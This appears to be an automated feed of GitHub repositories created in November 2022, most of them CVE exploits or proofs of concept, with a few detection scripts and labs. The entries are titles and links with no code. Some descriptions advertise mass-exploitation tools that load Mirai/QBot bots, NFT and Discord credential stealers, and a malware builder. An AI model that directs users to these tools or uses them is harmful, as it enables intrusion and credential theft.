**no description** : [sudoninja-noob/CVE-2022-45217](https://github.com/sudoninja-noob/CVE-2022-45217) create time: 2022-11-29T13:05:14Z

**no description** : [sudoninja-noob/CVE-2022-43369](https://github.com/sudoninja-noob/CVE-2022-43369) create time: 2022-11-29T12:58:59Z

**no description** : [fei9747/CVE-2016-5195](https://github.com/fei9747/CVE-2016-5195) create time: 2022-11-29T09:56:20Z

**no description** : [fei9747/CVE-2017-16995](https://github.com/fei9747/CVE-2017-16995) create time: 2022-11-29T09:59:40Z

**no description** : [fei9747/CVE-2021-4034](https://github.com/fei9747/CVE-2021-4034) create time: 2022-11-29T09:55:49Z

**Nmap .nse script to scan for CVE-2022-32073 in wolfssh** : [mgregus/project_BIT_nmap_script](https://github.com/mgregus/project_BIT_nmap_script) create time: 2022-11-29T09:28:18Z

**A Shell exploit for CVE-2022-25765** : [Atsukoro1/PDFKitExploit](https://github.com/Atsukoro1/PDFKitExploit) create time: 2022-11-29T09:25:13Z

**no description** : [renmizo/CVE-2022-41413](https://github.com/renmizo/CVE-2022-41413) create time: 2022-11-29T02:42:16Z

**no description** : [renmizo/CVE-2022-41412](https://github.com/renmizo/CVE-2022-41412) create time: 2022-11-29T02:39:08Z

**CVE-2022-22965 proof of concept** : [clemoregan/SSE4-CVE-2022-22965](https://github.com/clemoregan/SSE4-CVE-2022-22965) create time: 2022-11-28T14:34:51Z

**no description** : [ClemExp/CVE-2022-22965-PoC](https://github.com/ClemExp/CVE-2022-22965-PoC) create time: 2022-11-28T14:28:07Z

**CVE-2021-33558 POC** : [anldori/CVE-2021-33558](https://github.com/anldori/CVE-2021-33558) create time: 2022-11-28T03:50:10Z

**By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.** : [snowcra5h/CVE-2003-0358](https://github.com/snowcra5h/CVE-2003-0358) create time: 2022-11-27T22:45:43Z

**no description** : [NetJBS/-CVE-2018-7602](https://github.com/NetJBS/-CVE-2018-7602) create time: 2022-11-27T22:32:15Z

**DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions.** : [Chocapikk/CVE-2022-29455](https://github.com/Chocapikk/CVE-2022-29455) create time: 2022-11-27T18:45:15Z

**no description** : [trhacknon/CVE-2022-29455-XSS](https://github.com/trhacknon/CVE-2022-29455-XSS) create time: 2022-11-26T23:02:01Z

**no description** : [tchize/CVE-2022-22971](https://github.com/tchize/CVE-2022-22971) create time: 2022-11-26T22:04:38Z

**ChurchInfo 1.2.13-1.3.0 Remote Code Execution Exploit** : [MRvirusIR/CVE-2021-43258](https://github.com/MRvirusIR/CVE-2021-43258) create time: 2022-11-26T09:00:10Z

**Unauthenticated rce in sophos User Portal and Webadmin components mass exploitation tool** : [Adynervi/CVE-2022-3236-MASS-RCE](https://github.com/Adynervi/CVE-2022-3236-MASS-RCE) create time: 2022-11-25T18:43:37Z

**no description** : [dr6817/CVE-2022-22963](https://github.com/dr6817/CVE-2022-22963) create time: 2022-11-25T15:31:19Z

**CVE-2017-9833 POC** : [anldori/CVE-2017-9833](https://github.com/anldori/CVE-2017-9833) create time: 2022-11-25T08:31:31Z

**Confluence** : [Jhonsonwannaa/CVE_20222_26134](https://github.com/Jhonsonwannaa/CVE_20222_26134) create time: 2022-11-25T01:28:09Z

**Improper Restriction of Excessive Authentication Attempts (Brute Force) on wger workout application** : [HackinKraken/CVE-2022-2650](https://github.com/HackinKraken/CVE-2022-2650) create time: 2022-11-24T21:01:49Z

**perfex crm 1.10 is vulnerable to Stored Cross Site Scripting (XSS) via /clients/profile.** : [zecopro/CVE-2021-40303](https://github.com/zecopro/CVE-2021-40303) create time: 2022-11-24T20:00:16Z

**CVE-2022-39197** : [adeljck/CVE-2022-39197](https://github.com/adeljck/CVE-2022-39197) create time: 2022-11-24T17:22:10Z

**no description** : [azhurtanov/CVE-2022-38374](https://github.com/azhurtanov/CVE-2022-38374) create time: 2022-11-24T13:13:08Z

**no description** : [M889SEC/CVE-2022](https://github.com/M889SEC/CVE-2022) create time: 2022-11-23T21:20:39Z

**no description** : [mattysaints/CVE-2018-14371](https://github.com/mattysaints/CVE-2018-14371) create time: 2022-11-23T16:47:09Z

**An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file.** : [bypazs/CVE-2022-32060](https://github.com/bypazs/CVE-2022-32060) create time: 2022-11-23T16:20:24Z

**CVE-2022-39425 PoC** : [bob11vrdp/CVE-2022-39425](https://github.com/bob11vrdp/CVE-2022-39425) create time: 2022-11-23T14:03:43Z

**no description** : [alalng/CVE-2022-44789](https://github.com/alalng/CVE-2022-44789) create time: 2022-11-22T23:11:08Z

**CVE-2021-22205 Exploitation of unauthenticated upload** : [pdelteil/CVE-2021-22205](https://github.com/pdelteil/CVE-2021-22205) create time: 2022-11-22T22:58:48Z

**DOM Based XSS** : [nicbrinkley/CVE-2022-45472](https://github.com/nicbrinkley/CVE-2022-45472) create time: 2022-11-22T22:21:49Z

**no description** : [grails/GSSC-CVE-2022-41923](https://github.com/grails/GSSC-CVE-2022-41923) create time: 2022-11-22T17:24:51Z

**no description** : [tinhtrumtd/ANM_CVE_2019_0708](https://github.com/tinhtrumtd/ANM_CVE_2019_0708) create time: 2022-11-22T16:14:57Z

**Apache HTTP-Server 2.4.49-2.4.50 Path Traversal & Remote Code Execution PoC (CVE-2021-41773 & CVE-2021-42013)** : [blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution](https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution) create time: 2022-11-22T14:09:18Z

**If you are cloning the project then run this first, otherwise you can download the source code on the release page and skip this step. In order to make use of this dapp, all you need to do is change the configurations to point to your smart contract as well as update the images and theme file. For the most part all the changes will be in the publi** : [RCSVVVVVOLk/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/RCSVVVVVOLk/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-11-22T16:02:49Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.Silent JPG Exploit There are multiple Exploit JPG in Silent JPG Exploit, a** : [RCSVVVVVOLk/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/RCSVVVVVOLk/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-11-22T15:46:00Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s** : [RCSVVVVVOLk/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/RCSVVVVVOLk/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-11-22T15:44:51Z

**no description** : [tinhtrumtd/CDANM_CVE_2019_0708](https://github.com/tinhtrumtd/CDANM_CVE_2019_0708) create time: 2022-11-22T15:02:59Z

**PoC for CVE-2021-31166 and CVE-2022-21907** : [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher) create time: 2022-11-22T09:10:36Z

**no description** : [dr4g0n23/CVE-2020-1472](https://github.com/dr4g0n23/CVE-2020-1472) create time: 2022-11-22T03:35:47Z

**no description** : [trhacknon/CVE-2022-24637](https://github.com/trhacknon/CVE-2022-24637) create time: 2022-11-21T22:15:45Z

**no description** : [Jhonsonwannaa/CVE-2022-22954](https://github.com/Jhonsonwannaa/CVE-2022-22954) create time: 2022-11-21T21:22:39Z

**Python Script to exploit RCE of CVE-2022-42889** : [pwnb0y/Text4shell-exploit](https://github.com/pwnb0y/Text4shell-exploit) create time: 2022-11-21T18:01:28Z

**no description** : [Jhonsonwannaa/CVE-2017-9841-](https://github.com/Jhonsonwannaa/CVE-2017-9841-) create time: 2022-11-21T16:36:48Z

**no description** : [Jhonsonwannaa/CVE-2022-29464-](https://github.com/Jhonsonwannaa/CVE-2022-29464-) create time: 2022-11-21T13:57:53Z

**no description** : [aryrz/cve-2022-41352-zimbra-rce](https://github.com/aryrz/cve-2022-41352-zimbra-rce) create time: 2022-11-21T07:10:12Z

**修改版CVE-2022-0847** : [qwert419/linux-](https://github.com/qwert419/linux-) create time: 2022-11-21T01:21:35Z

**no description** : [siegfrkn/CSCI5403_CVE20220847_Detection](https://github.com/siegfrkn/CSCI5403_CVE20220847_Detection) create time: 2022-11-21T00:40:18Z

**no description** : [siegfrkn/CSCI5403_FinalProject_CVE20220847_Detection](https://github.com/siegfrkn/CSCI5403_FinalProject_CVE20220847_Detection) create time: 2022-11-21T00:39:16Z

**INFORMATION DISCLOSURE :CSRF to enable syslog mode and send to remote syslog server IP and Port.** : [huzaifahussain98/CVE-2020-23593](https://github.com/huzaifahussain98/CVE-2020-23593) create time: 2022-11-20T17:39:48Z

**CSRF attack leads to Reset ONU to Factory Default** : [huzaifahussain98/CVE-2020-23592](https://github.com/huzaifahussain98/CVE-2020-23592) create time: 2022-11-20T17:38:21Z

**ARBITAR FILE UPLOAD LEADS TO "delete every file for Denial of Service (using 'rm -rf *.*' in the code), reverse connection (using '.asp' webshell), backdoor , Escalation of Privileges, etc".** : [huzaifahussain98/CVE-2020-23591](https://github.com/huzaifahussain98/CVE-2020-23591) create time: 2022-11-20T17:38:06Z

**CSRF leads to change the password for "WLAN SSID"** : [huzaifahussain98/CVE-2020-23590](https://github.com/huzaifahussain98/CVE-2020-23590) create time: 2022-11-20T17:37:49Z

**Denial of Service through CSRF** : [huzaifahussain98/CVE-2020-23589](https://github.com/huzaifahussain98/CVE-2020-23589) create time: 2022-11-20T17:37:29Z

**CSRF attack leads to "Enable or Disable Ports" and to "Change port numbers** : [huzaifahussain98/CVE-2020-23588](https://github.com/huzaifahussain98/CVE-2020-23588) create time: 2022-11-20T17:37:14Z

**Men in the middle attack is possible through CSRF** : [huzaifahussain98/CVE-2020-23587](https://github.com/huzaifahussain98/CVE-2020-23587) create time: 2022-11-20T17:37:03Z

**CSRF allows to Add Network Traffic Control Type Rule** : [huzaifahussain98/CVE-2020-23586](https://github.com/huzaifahussain98/CVE-2020-23586) create time: 2022-11-20T17:36:51Z

**cross-site request forgery (CSRF) attack on "OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028".** : [huzaifahussain98/CVE-2020-23585](https://github.com/huzaifahussain98/CVE-2020-23585) create time: 2022-11-20T17:27:09Z

**Detection and Mitigation script for CVE-2021-42717 -> ModSecurity DoS Vulnerability in JSON Parsing** : [EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717](https://github.com/EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717) create time: 2022-11-20T18:01:34Z

**REMOTE CODE EXECUTION** : [huzaifahussain98/CVE-2020-23584](https://github.com/huzaifahussain98/CVE-2020-23584) create time: 2022-11-20T17:17:37Z

**REMOTE CODE EXECUTION found in "OPTILINK OP-XT71000N".** : [huzaifahussain98/CVE-2020-23583](https://github.com/huzaifahussain98/CVE-2020-23583) create time: 2022-11-20T17:02:19Z

**OPTILINK E-PON "MODEL NO: OP-XT71000N" with "HARDWARE VERSION: V2.2"; & "FIRMWARE VERSION: OP_V3.3.1-191028"** : [huzaifahussain98/CVE-2020-23582](https://github.com/huzaifahussain98/CVE-2020-23582) create time: 2022-11-20T16:37:09Z

**no description** : [RashidKhanPathan/CVE-2022-44830](https://github.com/RashidKhanPathan/CVE-2022-44830) create time: 2022-11-20T11:35:05Z

**no description** : [RashidKhanPathan/CVE-2022-43117](https://github.com/RashidKhanPathan/CVE-2022-43117) create time: 2022-11-20T11:33:46Z

**no description** : [thehackingverse/CVE-2022-3546](https://github.com/thehackingverse/CVE-2022-3546) create time: 2022-10-16T10:35:24Z

**Resources required for building Pluralsight CVE-2022-0847 lab** : [Turzum/ps-lab-cve-2022-0847](https://github.com/Turzum/ps-lab-cve-2022-0847) create time: 2022-11-16T16:57:14Z

**A Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.** : [0xAbbarhSF/FollinaXploit](https://github.com/0xAbbarhSF/FollinaXploit) create time: 2022-11-19T18:09:47Z

**Cross Site Scripting on sanitization-management-system** : [Urban4/CVE-2022-3992](https://github.com/Urban4/CVE-2022-3992) create time: 2022-11-19T10:36:37Z

**CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15** : [xgm0129/mai-lang-chain](https://github.com/xgm0129/mai-lang-chain) create time: 2022-11-19T05:51:38Z

**Mastering CVE-2021-3166** : [kaisersource/CVE-2021-3166](https://github.com/kaisersource/CVE-2021-3166) create time: 2022-11-18T18:28:57Z

**Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50** : [12345qwert123456/CVE-2021-42013](https://github.com/12345qwert123456/CVE-2021-42013) create time: 2022-11-18T17:53:46Z

**no description** : [daai1/CVE-2012-1823](https://github.com/daai1/CVE-2012-1823) create time: 2022-11-18T12:46:10Z

**Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC** : [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127) create time: 2022-11-18T13:19:23Z

**no description** : [Adamanti1/CVE-2021-41773-Vulnerable-service](https://github.com/Adamanti1/CVE-2021-41773-Vulnerable-service) create time: 2022-11-18T12:23:04Z

**CVE-2022-0441 - MasterStudy LMS 2.7.6** : [SDragon1205/cve-2022-0441](https://github.com/SDragon1205/cve-2022-0441) create time: 2022-11-18T07:02:29Z

**wordpress docker** : [CAOlvchonger/CVE-2016-10033](https://github.com/CAOlvchonger/CVE-2016-10033) create time: 2022-11-18T02:07:39Z

**no description** : [trhacknon/exploit-grafana-CVE-2021-43798](https://github.com/trhacknon/exploit-grafana-CVE-2021-43798) create time: 2022-11-18T02:12:52Z

**no description** : [Abdulazizalsewedy/CVE-2021-29447](https://github.com/Abdulazizalsewedy/CVE-2021-29447) create time: 2022-11-17T15:38:22Z

**A write-up of my (so far inconclusive) look into CVE-2022-31691** : [SpindleSec/CVE-2022-31691](https://github.com/SpindleSec/CVE-2022-31691) create time: 2022-11-17T13:09:03Z

**no description** : [siholley/CVE-2022-0847-Dirty-Pipe-Vulnerability-](https://github.com/siholley/CVE-2022-0847-Dirty-Pipe-Vulnerability-) create time: 2022-11-17T13:25:32Z

**no description** : [ProxyStaffy/Mediatrix-CVE-2022-43096](https://github.com/ProxyStaffy/Mediatrix-CVE-2022-43096) create time: 2022-11-17T09:00:52Z

**no description** : [trhacknon/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/trhacknon/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC) create time: 2022-11-17T08:09:38Z

**no description** : [trhacknon/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://github.com/trhacknon/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972) create time: 2022-11-17T08:08:50Z

**no description** : [trhacknon/CVE-2021-44228-Scanner](https://github.com/trhacknon/CVE-2021-44228-Scanner) create time: 2022-11-17T07:22:29Z

**CouchDB & EPMD RCE exploit** : [LightningGod7/CVE-2022-24706-POC](https://github.com/LightningGod7/CVE-2022-24706-POC) create time: 2022-11-17T06:16:47Z

**no description** : [notareaperbutDR34P3r/Kerberos_CVE-2022-33679](https://github.com/notareaperbutDR34P3r/Kerberos_CVE-2022-33679) create time: 2022-11-16T10:56:02Z

**A massive scanner for CVE-2021-34473 Microsoft Exchange Windows Vulnerability** : [ipsBruno/CVE-2021-34473-NMAP-SCANNER](https://github.com/ipsBruno/CVE-2021-34473-NMAP-SCANNER) create time: 2022-11-16T08:22:29Z

**A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.** : [Z3R0W4R3/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/Z3R0W4R3/CVE-2022-0847-DirtyPipe-Exploits) create time: 2022-11-16T03:44:14Z

**FIxed exploit for CVE-2022-24637 (original xplt: https://www.exploit-db.com/exploits/51026)** : [icebreack/CVE-2022-24637](https://github.com/icebreack/CVE-2022-24637) create time: 2022-11-15T22:39:49Z

**Apache Exploitation** : [WebApache/CVE-2021-41773-Apache-RCE](https://github.com/WebApache/CVE-2021-41773-Apache-RCE) create time: 2022-11-15T21:26:31Z

**PoC for CVE-2022-2601** : [zhangboyang/cve-2022-2601](https://github.com/zhangboyang/cve-2022-2601) create time: 2022-11-15T18:34:53Z

**no description** : [qq87234770/CVE-2022-22947](https://github.com/qq87234770/CVE-2022-22947) create time: 2022-11-15T09:11:14Z

**no description** : [hohlovscky2017/Demo_15_11_2022_cvety](https://github.com/hohlovscky2017/Demo_15_11_2022_cvety) create time: 2022-11-15T06:21:39Z

**no description** : [trhacknon/CVE-2019-11043](https://github.com/trhacknon/CVE-2019-11043) create time: 2022-11-15T04:01:54Z

**A Golang program to automate the execution of CVE-2021-29447** : [thomas-osgood/CVE-2021-29447](https://github.com/thomas-osgood/CVE-2021-29447) create time: 2022-11-15T03:15:59Z

**Social WarFare Plugin (<=3.5.2) Remote Code Execution** : [caique-garbim/CVE-2019-9978_Exploit](https://github.com/caique-garbim/CVE-2019-9978_Exploit) create time: 2022-11-15T01:22:38Z

**no description** : [gbrsh/CVE-2022-29464](https://github.com/gbrsh/CVE-2022-29464) create time: 2022-11-14T18:22:41Z

**fall2022 secure coding CVE-2019-13272 : Linux Kernel Improper Privilege Management Vulnerability** : [GgKendall/secureCodingDemo](https://github.com/GgKendall/secureCodingDemo) create time: 2022-11-14T00:07:04Z

**no description** : [mega8bit/exploit_cve-2021-29447](https://github.com/mega8bit/exploit_cve-2021-29447) create time: 2022-11-14T17:05:27Z

**Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE** : [caique-garbim/CVE-2020-9484_Exploit](https://github.com/caique-garbim/CVE-2020-9484_Exploit) create time: 2022-11-14T14:48:30Z

**ManageEngine - RCE - Includes mass exploiter Mirai / QBot - x86** : [OneByt3/CVE-2022-35405](https://github.com/OneByt3/CVE-2022-35405) create time: 2022-11-14T15:08:52Z

**ConnectWise - RCE - Included mass exploiter for mirai / qbot - x86 bots** : [OneByt3/CVE-2022-36537](https://github.com/OneByt3/CVE-2022-36537) create time: 2022-11-14T15:01:57Z

**Microsoft Exchange Server Remote Code Execution Vulnerability.** : [notareaperbutDR34P3r/http-vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/http-vuln-CVE-2022-41082) create time: 2022-11-14T08:31:16Z

**no description** : [CyberKimathi/Py3-CVE-2017-0785](https://github.com/CyberKimathi/Py3-CVE-2017-0785) create time: 2022-11-13T09:32:11Z

**PostgreSQL 9.3-11.7 - Remote Code Execution (RCE)** : [chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7](https://github.com/chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7) create time: 2022-11-13T04:28:55Z

**no description** : [ivilpez/cve-2017-16995.c](https://github.com/ivilpez/cve-2017-16995.c) create time: 2022-11-12T15:47:19Z

**Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.** : [M3l0nPan/wordpress-cve-2021-29447](https://github.com/M3l0nPan/wordpress-cve-2021-29447) create time: 2022-11-11T22:41:45Z

**no description** : [Cr4ckC4t/cve-2022-41352-zimbra-rce](https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce) create time: 2022-11-11T20:58:08Z

**This is an OpenSSL Vulnerability Detection Script for CVE-2022-2274** : [EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script](https://github.com/EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script) create time: 2022-11-11T16:27:45Z

**A Shodan hunter for CVE-2022-40140** : [ipsBruno/CVE-2022-40140-SCANNER](https://github.com/ipsBruno/CVE-2022-40140-SCANNER) create time: 2022-11-11T16:25:29Z

**cve-2022-5** : [mike-develop-root/cve-2022-5](https://github.com/mike-develop-root/cve-2022-5) create time: 2022-11-11T13:47:00Z

**cve-2022-1** : [mike-develop-root/cve-2022-1](https://github.com/mike-develop-root/cve-2022-1) create time: 2022-11-11T13:09:35Z

**XSS in Simple Cashiering System** : [maikroservice/CVE-2022-3949](https://github.com/maikroservice/CVE-2022-3949) create time: 2022-11-11T12:21:51Z

**A write-up and LPE PoC of an OOB read and write vulnerability in the Linux Kernel.** : [ysanatomic/CVE-2022-1015](https://github.com/ysanatomic/CVE-2022-1015) create time: 2022-10-23T10:57:43Z

**no description** : [maikroservice/CVE-2022-3942](https://github.com/maikroservice/CVE-2022-3942) create time: 2022-11-11T10:24:01Z

**CVE:CVE-2008-4250** : [hasanMohammed96/ms08-067](https://github.com/hasanMohammed96/ms08-067) create time: 2022-11-11T07:41:30Z

**POC for cve-2022-22620** : [dkjiayu/dkjiayu.github.io](https://github.com/dkjiayu/dkjiayu.github.io) create time: 2022-11-11T06:35:25Z

**POC for cve-2022-22620** : [dkjiayu/github.io](https://github.com/dkjiayu/github.io) create time: 2022-11-11T06:30:00Z

**Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215** : [gigaryte/cve-2022-31898](https://github.com/gigaryte/cve-2022-31898) create time: 2022-11-11T05:11:14Z

**Implementation of CVE-2022-30190 in C** : [mattjmillner/CVE-Smackdown](https://github.com/mattjmillner/CVE-Smackdown) create time: 2022-11-10T18:15:57Z

**no description** : [Joanmei/CVE-2017-0785](https://github.com/Joanmei/CVE-2017-0785) create time: 2022-11-10T15:34:58Z

**Cross Site Scripting in WonderCMS** : [maikroservice/CVE-2022-43332](https://github.com/maikroservice/CVE-2022-43332) create time: 2022-11-10T10:06:14Z

**no description** : [nanopathi/Linux-4.19.72_CVE-2022-1012](https://github.com/nanopathi/Linux-4.19.72_CVE-2022-1012) create time: 2022-11-10T08:30:12Z

**A Exploit Tool For CVE-2021-25641.** : [l0n3rs/CVE-2021-25641](https://github.com/l0n3rs/CVE-2021-25641) create time: 2022-11-10T06:33:54Z

**CVE-2022-39395 valid pay** : [harry1osborn/CVE-2022-39395](https://github.com/harry1osborn/CVE-2022-39395) create time: 2022-11-10T01:42:03Z

**Lenovo Diagnostics Driver EoP - Arbitrary R/W** : [alfarom256/CVE-2022-3699](https://github.com/alfarom256/CVE-2022-3699) create time: 2022-11-09T14:15:30Z

**no description** : [bantu2301/CVE-2018-16858](https://github.com/bantu2301/CVE-2018-16858) create time: 2022-11-09T13:36:40Z

**CVE-2020-0796** : [SEHandler/CVE-2020-0796](https://github.com/SEHandler/CVE-2020-0796) create time: 2022-11-09T13:46:24Z

**Second Database For CVE-2021-40438_Docker_2 (FYP project, for own use only)** : [WilsonFung414/CVE-2021-27928_Docker_2](https://github.com/WilsonFung414/CVE-2021-27928_Docker_2) create time: 2022-11-09T13:33:52Z

**Second one for web vulnerability (FYP Project, for own use only)** : [WilsonFung414/CVE-2021-40438_Docker_2](https://github.com/WilsonFung414/CVE-2021-40438_Docker_2) create time: 2022-11-09T13:32:10Z

**no description** : [chr1sM/CVE-2018-6574](https://github.com/chr1sM/CVE-2018-6574) create time: 2022-11-09T10:49:44Z

**A simple tool to enumerate users in gitlab** : [ipsBruno/CVE-2022-1162](https://github.com/ipsBruno/CVE-2022-1162) create time: 2022-11-09T08:14:28Z

**no description** : [jeyaseelans86/new-CVE-2018-6574](https://github.com/jeyaseelans86/new-CVE-2018-6574) create time: 2022-11-09T06:35:25Z

**no description** : [jeyaseelans86/CVE-2018-6574](https://github.com/jeyaseelans86/CVE-2018-6574) create time: 2022-11-09T06:28:02Z

**no description** : [nidhi7598/linux-3.0.35_CVE-2018-13405](https://github.com/nidhi7598/linux-3.0.35_CVE-2018-13405) create time: 2022-11-09T05:18:49Z

**Detects attempts at exploitation of CVE-2022-3602, a remote code execution vulnerability in OpenSSL v 3.0.0 through v.3.0.6** : [corelight/CVE-2022-3602](https://github.com/corelight/CVE-2022-3602) create time: 2022-11-03T03:19:52Z

**no description** : [sai-reddy2021/CVE-2021-1675-LPE](https://github.com/sai-reddy2021/CVE-2021-1675-LPE) create time: 2022-11-08T19:44:52Z

**no description** : [m4sk0ff/CVE-2021-38819](https://github.com/m4sk0ff/CVE-2021-38819) create time: 2022-11-08T17:01:41Z

**DO NOT USE FOR ANYTHING REAL. Simple springboot sample app with vulnerability CVE-2021-44228 aka "Log4Shell"** : [srcporter/CVE-2021-44228](https://github.com/srcporter/CVE-2021-44228) create time: 2022-11-08T15:29:42Z

**CVE-2022-0824, CVE-2022-0829, File Manger privilege exploit** : [gokul-ramesh/WebminRCE-exploit](https://github.com/gokul-ramesh/WebminRCE-exploit) create time: 2022-11-08T15:22:55Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138) create time: 2022-11-08T14:16:45Z

**no description** : [iloveflag/Fast-CVE-2022-22965](https://github.com/iloveflag/Fast-CVE-2022-22965) create time: 2022-11-08T13:45:35Z

**This is a reference/POC for CVE-2021-43657** : [c0n5n3d/CVE-2021-43657](https://github.com/c0n5n3d/CVE-2021-43657) create time: 2022-11-08T02:13:29Z

**no description** : [cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786](https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786) create time: 2022-11-07T07:58:36Z

**no description** : [yilin1203/CVE-2018-20062](https://github.com/yilin1203/CVE-2018-20062) create time: 2022-11-07T07:05:40Z

**no description** : [adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889](https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889) create time: 2022-11-07T07:19:49Z

**The first poc video presenting the sql injection test from ( WordPress Core 5.8.2-'WP_Query' SQL Injection )** : [APTIRAN/CVE-2022-21661](https://github.com/APTIRAN/CVE-2022-21661) create time: 2022-11-06T20:44:10Z

**Proof of Concept for CVE-2021-29447 written in Python** : [Val-Resh/CVE-2021-29447-POC](https://github.com/Val-Resh/CVE-2021-29447-POC) create time: 2022-11-06T12:13:31Z

**Unauthenticated rce in sophos User Portal and Webadmin components mass exploitation tool** : [g01f/CVE-2022-3236-POC](https://github.com/g01f/CVE-2022-3236-POC) create time: 2022-11-06T12:27:14Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [HarleyDoo/CVE-2022-32548-RCE-POC](https://github.com/HarleyDoo/CVE-2022-32548-RCE-POC) create time: 2022-11-06T12:03:05Z

**gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread** : [sniper404ghostxploit/CVE-2022-2586](https://github.com/sniper404ghostxploit/CVE-2022-2586) create time: 2022-11-06T07:34:32Z

**Unauthenticated RCE in GLPI 10.0.2** : [Gabriel-Lima232/CVE-2022-35914](https://github.com/Gabriel-Lima232/CVE-2022-35914) create time: 2022-11-06T06:23:14Z

**A single script controller based on CVE-2021-29447** : [akhils911dev/blind-xxe-controller-CVE-2021-29447](https://github.com/akhils911dev/blind-xxe-controller-CVE-2021-29447) create time: 2022-11-06T04:26:20Z

**no description** : [b-abderrahmane/CVE-2021-29447-POC](https://github.com/b-abderrahmane/CVE-2021-29447-POC) create time: 2022-11-05T21:00:03Z

**PoC to exploit CVE-2022-43144** : [mudassiruddin/CVE-2022-43144-Stored-XSS](https://github.com/mudassiruddin/CVE-2022-43144-Stored-XSS) create time: 2022-11-05T19:30:41Z

**no description** : [QAInsights/cve-2022-42889-jmeter](https://github.com/QAInsights/cve-2022-42889-jmeter) create time: 2022-11-05T14:08:18Z

**This repo contains payload for the CVE-2022-36067** : [Prathamrajgor/Exploit-For-CVE-2022-36067](https://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067) create time: 2022-11-05T13:28:27Z

**CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept** : [sunnyvale-it/CVE-2022-42889-PoC](https://github.com/sunnyvale-it/CVE-2022-42889-PoC) create time: 2022-11-05T07:32:51Z

**Proof of Concept for CVE-2022-42889 (Text4Shell Vulnerability)** : [cryxnet/CVE-2022-42889-PoC](https://github.com/cryxnet/CVE-2022-42889-PoC) create time: 2022-11-04T19:26:23Z

**no description** : [Jhonsonwannaa/CVE-2022-36804](https://github.com/Jhonsonwannaa/CVE-2022-36804) create time: 2022-11-03T23:31:48Z

**CVE-2020-8813 - RCE through graph_realtime.php in Cacti 1.2.8** : [p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime](https://github.com/p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime) create time: 2022-09-30T11:23:52Z

**利用sudo提权,只针对cnetos7** : [PhuketIsland/CVE-2021-3156-centos7](https://github.com/PhuketIsland/CVE-2021-3156-centos7) create time: 2022-11-03T13:10:23Z

**poc of CVE-2022-33679** : [Amulab/CVE-2022-33679](https://github.com/Amulab/CVE-2022-33679) create time: 2022-11-03T11:19:29Z

**poc of CVE-2022-33679** : [Blyth0He/CVE-2022-33679](https://github.com/Blyth0He/CVE-2022-33679) create time: 2022-11-03T09:52:31Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2022-36946](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-36946) create time: 2022-11-03T09:49:23Z

**Privilege Escalation in Teachers Record Management System using CodeIgnitor** : [RashidKhanPathan/CVE-2022-41446](https://github.com/RashidKhanPathan/CVE-2022-41446) create time: 2022-11-03T09:10:24Z

